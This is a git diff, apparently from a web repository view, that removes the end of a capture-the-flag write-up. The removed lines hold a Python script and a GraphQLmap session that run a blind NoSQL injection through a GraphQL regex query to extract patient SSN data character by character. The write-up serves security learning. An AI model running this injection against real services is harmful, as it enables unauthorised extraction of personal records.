Fix Part 1 - HIP
parent
ce0b6c9142
commit
2d816cd5c9
|
@ -169,31 +169,3 @@ The injection worked, now we can re-use the payload from the challenge #2 and ex
|
||||||
{% endhighlight %}
|
{% endhighlight %}
|
||||||
|
|
||||||
Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`.
|
Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`.
|
||||||
|
|
||||||
{% highlight python %}
|
|
||||||
def blind_nosql(URL):
|
|
||||||
data = ""
|
|
||||||
data_size = 35
|
|
||||||
charset = "0123456789abcdef-"
|
|
||||||
while len(data) != data_size:
|
|
||||||
for c in charset:
|
|
||||||
query ="{doctors(options:%20%22{\%22\%22patients.ssn\%22:1}%22,%20search:%20%22{%20\%22patients.ssn\%22:%20{%20\%22$regex\%22:%20\%22^PLACEHOLDER\%22},%20\%22lastName\%22:\%22Admin\%22%20,%20\%22firstName\%22:\%22Admin\%22%20}%22){id, firstName}}"
|
|
||||||
injected = (URL.format(query)).replace("PLACEHOLDER", data + c)
|
|
||||||
r = requests.get(injected)
|
|
||||||
if r.json()['data']['doctors'] != []:
|
|
||||||
data += c
|
|
||||||
print("\033[92m[+] Data found:\033[0m {}".format(data))
|
|
||||||
{% endhighlight %}
|
|
||||||
|
|
||||||
At that time we were checking if the content of `r.json()['data']['doctors']` was not empty, in order to abstract the data extraction we now take a check input from the user in order to compare the output.
|
|
||||||
|
|
||||||
|
|
||||||
{% highlight json %}
|
|
||||||
GraphQLmap > nosqli
|
|
||||||
Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}}
|
|
||||||
Check > 5d089c51dcab2d0032fdd08d
|
|
||||||
[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b
|
|
||||||
{% endhighlight %}
|
|
||||||
|
|
||||||
I hope you enjoyed the challenges as I did !
|
|
||||||
Feel free to share the blog post ! :)
|
|
Loading…
Reference in New Issue